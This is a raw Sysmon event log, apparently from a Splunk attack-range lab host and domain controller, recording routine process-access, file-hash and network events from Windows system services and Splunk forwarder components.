5e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216698Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:51.508{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216697Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:51.508{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216696Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:51.508{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216695Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:51.508{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216694Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:51.508{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-118B-6216-5D04-000000003902}908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216693Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:51.508{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-118B-6216-5D04-000000003902}908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216692Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:51.509{4F8D34B0-118B-6216-5D04-000000003902}908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287741Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:52.902{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BE0B472E46D978BEC6B768F18AAEC32,SHA256=74C2317E9763D300FB24169C29AFE9F30A26F5611624A70F0CB1BDBE30C989B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216707Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:52.665{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7CB37808E16BBD2431584EAF1372038,SHA256=F2C174F72CEDDC433FAD84C0C9932B7481A02C83ABADA4B2F7D23860C14AA4F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216706Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:52.587{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D46742ED3C2DADD57B8BF8FAF8F418CB,SHA256=70AA00A098231DBBCCA737C903825B27C45D94AAF8C83F04D2CD99B2A58E1E52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287742Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:53.980{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD759FA95FD474C7A978F503773E00AD,SHA256=AF07A92A780145F3E5E8ECFDE65611C741C1B980224BDC94BF79244D9FE356BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216709Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:53.665{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C9995AB750679A568BF6D11CF2DAF7F,SHA256=F8DED42CD3A3CCAF83C8006424FAA10235620B7C991EF6521156C3F0CA22CBCF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216708Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:50.591{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51342-false10.0.1.12-8000- 23542300x8000000000000000216710Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:54.666{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8816846F3CE7B42FFC3F223C92D003FC,SHA256=9FFE85FA8B6F6BC47E9E27A18D12C168AE4683553758BDE4B6EF9EE6AF0149E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216711Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:55.666{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8C548F397594430839B71E0525D615A,SHA256=60364FFD7EF2E347BA79715A9DEDDE836EE7F99966338D45D33B75816B988662,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287743Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:54.996{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F083AD556F15AC965A826D8A1751D85C,SHA256=C80A1165CB85D68A7C82ACEAB8AA5E4005CB1CF91635C3432968D55E53950EA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216712Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:56.667{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F506B3FB50AEAEC379A8E2AE7766BD9C,SHA256=7DD22C341438C53B89D21C52AC56588E6D8B35821A8918C2F78648F87D1983AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287745Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:54.625{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53442-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287744Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:56.215{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32A5EF48DC9421E37EBA1BA0FE30EF1C,SHA256=D316C60B985C96CB39DD4B615DF4DD983817351D1831DD305F1DBF09CAF079F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216714Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:57.667{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10BAA7E1330561A320255D954A0EB41E,SHA256=75F6A75BC531BBFD182549B064C74D75A824D63B1EAAACE2C5F3BAE3C1B1E6CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287746Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:57.308{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B8E9BFCA03F22290B6971058E6AB08C,SHA256=8A61A2F1F3276948F0B87DFF80F1551C832045B077DB7E206801261BCAD830FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216713Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:55.624{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51343-false10.0.1.12-8000- 23542300x8000000000000000216716Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:58.669{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FDA7D1926E3D06154BF8E4BD83A0728,SHA256=BE64B3148066EF5E844B61B493C9E5086E339B290A57DF1760523D3B2CF3830F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287747Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:58.340{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D176F8EE2534A4DCDC92EA134C26829B,SHA256=131C493214229B24F2CDCD8A08871ED768903842779036AC388B2FFCEB695A48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216715Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:58.265{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-134MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216718Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:59.714{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95870101FE7991B8F482993C32925335,SHA256=EC52AF7CD2E15C28131FEFBFA565ABBFD5D0C11E84CC59371530F6C267F914A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287748Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:59.355{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEAE9E44F28EA4F3C5CF3BF991EEECD1,SHA256=D1E7A0DC696697E14CEE0ECB441ACFBF644F5A2387BE89983C1C79186082EA45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216717Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:59.264{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-135MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216719Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:00.763{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1512FA42396DB0106DAFA35885B687B8,SHA256=3BC13EAACE88ED0D6E25BC032D21D2FB0D8A1CA3EA7AEE8547EA47EBA3163B33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287749Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:00.480{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97A4302EC31E798A31996A602E3763CF,SHA256=0C966DC10DA5883A1D02241797CAC4DFCA93815B2B13838C3785488B33B24620,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287759Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:01.918{C8EA50B7-1195-6216-0E05-000000003802}36765812C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287758Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:01.558{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1195-6216-0E05-000000003802}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287757Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:01.527{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20160B8D1B9DF152FA1B813715639A55,SHA256=67ED9A0746989A04F10EFBBB85EA028A83BE2EC64F80A088DEDC594030FAE9E9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287756Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:01.511{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287755Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:01.511{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287754Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:01.511{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287753Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:01.511{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287752Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:01.511{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1195-6216-0E05-000000003802}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287751Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:01.511{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1195-6216-0E05-000000003802}3676C:\Program 